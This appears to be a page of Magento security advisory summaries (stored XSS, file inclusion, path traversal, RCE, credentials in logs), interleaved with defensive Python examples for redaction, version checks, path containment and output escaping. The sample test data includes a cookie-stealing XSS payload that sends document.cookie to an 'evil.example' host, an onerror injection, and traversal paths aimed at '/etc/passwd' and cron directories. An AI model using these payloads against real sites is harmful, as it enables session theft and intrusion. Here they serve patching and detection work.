Category: Magento Commerce

PRODSECBUG-2197: Admin credentials are logged in exception reports

Description: Exception error reports capture administrative credentials in clear text. Type: Information Disclosure CVSSv3 Severity: 3.9 Known Attacks: none Product(s) Affected: Magento Open Source prior to 1.9.4.1, and Magento Commerce prior to 1.14.4.1, Magento 2.1 prior to 2.1.17, Magento

Posted in Information Disclosure, Magento 1, Magento 2, Magento Commerce, Magento Open Source
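Added example for the entry above (not Magento's code): a redaction step that masks credential-bearing keys in the captured request before an exception report is assembled. The key patterns, the `redact`/`build_report` names and the sample failed-login request are this example's own assumptions.

```python
import re

# Keys whose values must never reach an error report. The pattern errs toward
# masking (it also hits "passphrase", "compass"); it is an assumption for this
# example, not a list taken from Magento's code.
SENSITIVE_KEY = re.compile(
    r"(pass(word|wd)?|secret|token|api[_-]?key|authorization|cookie)",
    re.IGNORECASE,
)
MASK = "***REDACTED***"


def redact(value):
    """Return a copy of `value` with values under sensitive keys masked.

    Recurses through dicts and lists so nested request data (a `login`
    sub-array in a POST body, a headers map) is covered. The input is not
    mutated; new containers are built on the way back up.
    """
    if isinstance(value, dict):
        return {
            k: (MASK if SENSITIVE_KEY.search(str(k)) else redact(v))
            for k, v in value.items()
        }
    if isinstance(value, list):
        return [redact(v) for v in value]
    return value


def build_report(exc, request):
    """Assemble the exception report from an exception and request context.
    The request is redacted here, before the report reaches a log or file."""
    return {
        "exception": type(exc).__name__,
        "message": str(exc),
        "request": redact(request),
    }


# Constructed sample: what an exception handler might capture from a failed
# admin login. All values are made up for this example.
SAMPLE_REQUEST = {
    "uri": "/admin/admin/index/index/",
    "post": {"login": {"username": "store_admin", "password": "Tr0ub4dor&3"}},
    "headers": {"Cookie": "admin=abc123", "Host": "shop.example"},
}


def demo():
    return build_report(RuntimeError("Database connection failed"), SAMPLE_REQUEST)
```

Key-based masking only covers structured request data; a stack trace that prints function arguments can still carry the same password, so a report writer should also drop argument values from frames (or the whole request body) rather than rely on this step alone.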

PRODSECBUG-2184: Stored cross-site scripting in the admin panel via the Terms & Conditions with Checkbox Text field

Description: An authenticated user with administrative privileges can embed arbitrary code via a stored cross-site scripting vulnerability in the Terms & Conditions with Checkbox Text field in the admin panel. Type: General: Cross Site Scripting CVSSv3 Severity: 5.7 Known

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

PRODSECBUG-2178: Stored cross-site scripting in the admin panel via the Admin Shopping Cart Rules page

Type: General: Cross Site Scripting CVSSv3 Severity: 5.8 Known Attacks: none Description: An authenticated user with administrative privileges can embed arbitrary code in the Conditions tab of Admin Shopping Cart Rules page. Product(s) Affected: Magento Open Source prior to 1.9.4.1,

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

PRODSECBUG-2181: Stored cross-site scripting in the Admin Customer Segments area

Description: An authenticated user with privileges to the Customer Segments section of the Admin can use a stored cross-site scripting vulnerability to embed malicious code. Type: General: Cross Site Scripting CVSSv3 Severity: 6.5 Known Attacks: none Product(s) Affected: Magento

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

PRODSECBUG-2069: Vulnerability in Attribute Group Name

Description: Reflected XSS can be inserted into an attribute group name in Admin > Stores > Attribute Set. Type: Cross-Site Scripting (XSS) – reflected CVSSv3 Severity: 4.2 Known Attacks: none Product(s) Affected: Magento 2.1 prior to 2.1.16, Magento 2.2 prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Reflected XSS

PRODSECBUG-2146: Remote Code Execution through the Product Media Upload in the Admin

Description: A path traversal vulnerability permits folder creation at arbitrary locations and file deletion from arbitrary locations in the Admin product image/media upload area. Type: Cross-Site Scripting (XSS) CVSSv3 Severity: 6.0 Product(s) Affected: Magento 2.1 prior to 2.1.16, Magento 2.2

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE, Stored XSS

APPSEC-1909: Admin account takeover via File upload information disclosure

Description: It was discovered that Magento reveals the HttpOnly admin session cookie in the response to a successful file upload in the admin. Because the response content type is JSON, an attacker can steal the admin session cookie by exploiting any

Posted in Authentication Bypass, Magento 2, Magento Commerce, Magento Open Source, Privilege Escalation

APPSEC-2094: Stored XSS – Website to Admin in Global Search

Description: A stored XSS vulnerability through which a website user can target admin accounts has been discovered in all Magento 2.x versions. It is easy for an attacker to exploit. Type: General: Cross Site Scripting (stored) CVSSv3 Severity: 9.6 Product(s) Affected:

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-2003: RCE via Varnish settings in admin

Description: An admin user can read any file on the server and execute arbitrary commands through Varnish. The vulnerability is in the Magento 2.2 admin configuration settings for Varnish, where an admin user can whitelist a list of IPs (ACL) and download the customized

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE

APPSEC-1878/1890: Cross-site Scripting in CMS hierarchy

Description: An administrator with limited privileges can insert script into the CMS hierarchy, which could potentially result in a stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1973: Cross-site Scripting in Newsletter Template

Description: An administrator with limited privileges can embed cross-site scripting elements in the Newsletter template, which could potentially lead to a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open Source

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1947: Cross-site Scripting in RMA functionality

Description: A user can insert script in the RMA SKU field, which could potentially result in a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1

Posted in Magento 2, Magento Commerce, Stored XSS

APPSEC-1945: Cross-site Scripting in Product SKU

Description: An administrator with limited privileges can insert script in the product SKU field, which could potentially result in a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open Source prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1944: Cross-site Scripting in Date fields

Description: An administrator with limited privileges can insert script into the private sales events and invitations fields, which can subsequently lead to a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1928: Cross-site Scripting in Downloadable Product Link

Description: An administrator with limited privileges can insert script in the downloadable product link title field, which could subsequently lead to a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1916: Cross-site Scripting in Attribute Group Name

Description: An administrator with limited privileges can insert script in the attribute group name field, which could potentially result in stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1908/1948: Cross-site Scripting in custom variable

Description: An administrator with limited privileges can insert script in the custom variables name field, which could potentially result in stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1891: Cross-site Scripting in Admin Shipment tracking

Description: An administrator with limited privileges can insert script into the shipment tracking, which could potentially result in stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento 2.0 prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1986: Local file inclusion in import history

Description: An administrator with limited privileges can delete critical system control files to subsequently gain privilege escalation through the Import History feature. Type: Local File Inclusion (LFI) CVSSv3 Severity: 6.1 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1

Posted in LFI, Magento 2, Magento Commerce, Magento Open Source

APPSEC-1901: Local file inclusion in customer view

Description: An administrator with limited privileges can read arbitrary files from the file system. Type: Local File Inclusion (LFI) CVSSv3 Severity: 6.4 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3

Posted in LFI, Magento 2, Magento Commerce, Magento Open Source
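Added example (not part of the original page or of Magento): a small parser for the "Product(s) Affected" clauses as they are written in these entries, and a check of an installed version against them. APPSEC-1901 above is the one entry whose affected list is complete on this page, so it is the primary sample; the PRODSECBUG-2197 text is also used as written here, including its cut-off end, to show that the parser only reports the branches it can see. Function names are this example's own.

```python
import re

# Clause shape used by the advisories on this page:
#   "Magento 2.1 prior to 2.1.12"   or   "Magento Open Source prior to 1.9.4.1"
CLAUSE = re.compile(
    r"Magento\s+(?:Open Source|Commerce|(\d+\.\d+))\s+prior to\s+(\d+(?:\.\d+)+)"
)


def _vt(version):
    """'2.2.3' -> (2, 2, 3)"""
    return tuple(int(p) for p in version.split("."))


def _lt(a, b):
    """Compare version tuples, padding the shorter one with zeros."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def parse_affected(text):
    """Return [(branch, first_fixed_version)] from a Product(s) Affected line.

    Magento 1 clauses name the product instead of a branch; there the branch
    is taken from the fix version (1.9.x is Open Source, 1.14.x is Commerce).
    Anything the text does not state (a cut-off tail, an unlisted branch) is
    simply absent from the result.
    """
    ranges = []
    for branch, fixed in CLAUSE.findall(text):
        fixed_t = _vt(fixed)
        branch_t = _vt(branch) if branch else fixed_t[:2]
        ranges.append((branch_t, fixed_t))
    return ranges


def is_affected(installed, ranges):
    """True/False when `installed` is on a listed branch; None when the branch
    is not listed, i.e. the parsed text says nothing about it."""
    inst = _vt(installed)
    for branch, fixed in ranges:
        if inst[: len(branch)] == branch:
            return _lt(inst, fixed)
    return None


# Affected-version text quoted from this page's entries.
APPSEC_1901 = ("Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, "
               "Magento 2.2 prior to 2.2.3")
# This excerpt is truncated on the page after "Magento"; only three clauses
# are recoverable from it.
PRODSECBUG_2197 = ("Magento Open Source prior to 1.9.4.1, and Magento Commerce "
                   "prior to 1.14.4.1, Magento 2.1 prior to 2.1.17, Magento")
```

A `None` result is a prompt to read the full advisory, not a clean bill of health: several excerpts on this page are cut off before their last branch.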

APPSEC-1907: Cross-site Scripting in Customer Address

Description: A user can insert script into his or her address, which could potentially result in stored cross-site scripting that affects administrators. Type: Cross-site Scripting (XSS) CVSSv3 Severity: 7.5 (High) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1 prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1952: Remote Code Execution using media upload

Description: An administrator with limited privileges can remotely execute code using a path traversal vulnerability during the CMS image or media upload process. Type: Remote Code Execution (RCE) CVSSv3 Severity: 9.8 (High) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE
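Added example for APPSEC-1952 above and PRODSECBUG-2146 earlier on this page (not Magento's code): the unsafe join that lets a request-supplied path create a folder or delete a file outside the media directory, beside a containment check that resolves the path first and refuses anything that lands outside the root. The `MEDIA_ROOT` value, the function names and the sample request paths are this example's own assumptions.

```python
import os

# Typical Magento 2 media directory; an assumption for this example.
MEDIA_ROOT = "/var/www/html/pub/media"


class UnsafePath(ValueError):
    """Raised when a request-supplied path would leave the media root."""


def naive_join(root, user_path):
    """The flawed pattern the advisories describe: the request path is joined
    onto the root and trusted. '..' segments walk out of the root, and an
    absolute user_path makes os.path.join discard the root entirely."""
    return os.path.normpath(os.path.join(root, user_path))


def resolve_under(root, user_path):
    """Resolve user_path against root and refuse anything that ends up outside
    root once '..' segments and symlinks have been resolved."""
    if "\x00" in user_path:
        raise UnsafePath("NUL byte in path")
    root_real = os.path.realpath(root)
    # realpath collapses '..' and follows existing symlinks, so a link inside
    # the media tree that points elsewhere is also caught. The commonpath
    # comparison is the check that actually bounds the result.
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise UnsafePath(f"{user_path!r} resolves outside {root!r}")
    return candidate


def classify(user_path, root=MEDIA_ROOT):
    """('ok', resolved_path) for an accepted request path, or ('blocked',
    where_naive_join_would_have_put_it) so the two behaviours can be compared."""
    try:
        return "ok", resolve_under(root, user_path)
    except UnsafePath:
        return "blocked", naive_join(root, user_path)


# Constructed request paths, the kind an upload or delete handler receives.
SAMPLE_PATHS = [
    "catalog/product/summer.jpg",          # ordinary upload target
    "wysiwyg/../tmp/cache/x.jpg",          # '..' that stays inside the root
    "../../../../../etc/cron.d/magento",   # folder creation outside the root
    "/etc/passwd",                         # absolute path: join drops the root
    "catalog/\x00.php",                    # NUL byte
]


def demo():
    return {p: classify(p) for p in SAMPLE_PATHS}
```

The same function serves the delete path: resolving before deleting is what stops a traversal payload from removing files outside the media tree.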

APPSEC-1892: Stored XSS in Visual Merchandiser

Description: An administrator with limited privileges can create a stored cross-site scripting attack in the Visual Merchandiser system. Type: Cross-Site Scripting (XSS, stored) CVSSv3 Severity: 6.1 (Medium) Product(s) Affected: Magento Open Source prior to 1.9.3.7, and Magento Commerce prior to

Posted in Magento 1, Magento Commerce, Magento Open Source, Stored XSS
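Added example (not Magento's code) covering the stored cross-site scripting entries on this page, from PRODSECBUG-2184, 2178 and 2181 through APPSEC-2094, 1878/1890, 1973, 1947, 1945, 1944, 1928, 1916, 1908/1948, 1891, 1907 and 1892: all of them are a stored value (a name, a title, an address, a SKU) echoed into an admin page without escaping for the context it lands in. The block shows the raw echo beside context-aware escaping, and a scan that flags stored values already carrying active content, which is what you would run over a database export of those fields after patching. Function names, the regex and the sample rows are this example's own.

```python
import html
import json
import re


def esc_text(value: str) -> str:
    """Escape for HTML element content."""
    return html.escape(value, quote=False)


def esc_attr(value: str) -> str:
    """Escape for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)


def esc_js(value: str) -> str:
    """Encode for a JavaScript string literal inside a <script> block.
    json.dumps handles quotes and backslashes; the replacements stop '</'
    from closing the script element and escape U+2028/U+2029, which are legal
    in JSON but terminate a JS string literal in older engines."""
    encoded = json.dumps(value, ensure_ascii=False)
    return (encoded.replace("</", "<\\/")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def render_unsafe(name: str) -> str:
    """What a stored-XSS bug looks like: the stored value echoed as-is into
    an attribute, into text and into a script block."""
    return f'<a data-name="{name}">{name}</a><script>var n = "{name}";</script>'


def render_safe(name: str) -> str:
    """Same markup, each interpolation escaped for its own context."""
    return (f'<a data-name="{esc_attr(name)}">{esc_text(name)}</a>'
            f'<script>var n = {esc_js(name)};</script>')


# Detection over already-stored values: tags that run script, inline event
# handlers and javascript: URLs. Tuned to be cheap to run over a dump of the
# fields named in the advisories, so expect to review the hits by hand.
ACTIVE_HTML = re.compile(
    r"<\s*script\b|<\s*(iframe|object|embed|svg|img|math)\b"
    r"|\son[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def looks_like_xss(value: str) -> bool:
    return ACTIVE_HTML.search(value) is not None


# Constructed sample rows, shaped like an export of admin-visible fields.
SAMPLE_ROWS = [
    ("attribute_group", "Product Details"),
    ("custom_variable", "Tom & Jerry <3 Promo"),
    ("attribute_group", '"><img src=x onerror=alert(document.cookie)>'),
    ("customer_address",
     "1 Main St</script><script>fetch('//evil.example/'+document.cookie)</script>"),
]


def suspicious_rows(rows=SAMPLE_ROWS):
    return [(field, value) for field, value in rows if looks_like_xss(value)]
```

Escaping at render time is the fix the advisories imply; stripping on input is not a substitute, since the same value is typically shown in several contexts and a value that is harmless as text can still break out of an attribute or a script string.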

APPSEC-1910: Local File Inclusion (LFI) in Import History

Description: An administrator with limited privileges can delete critical system control files to subsequently gain privilege escalation through the Import History section. Type: Local File Inclusion + Potential RCE CVSSv3 Severity: 6.1 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.17,

Posted in LFI, Magento Commerce, Magento Open Source

APPSEC-1900: Remote Code Execution by leveraging 1st stage unsanitized form input

Description: An administrator with limited privileges can create a store website whose unsanitized form input leads to arbitrary remote code execution. Type: Remote Code Execution (RCE) CVSSv3 Severity: 8.2 (High) Product(s) Affected: Magento 2.0 prior to 2.0.17, Magento 2.1 prior to

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE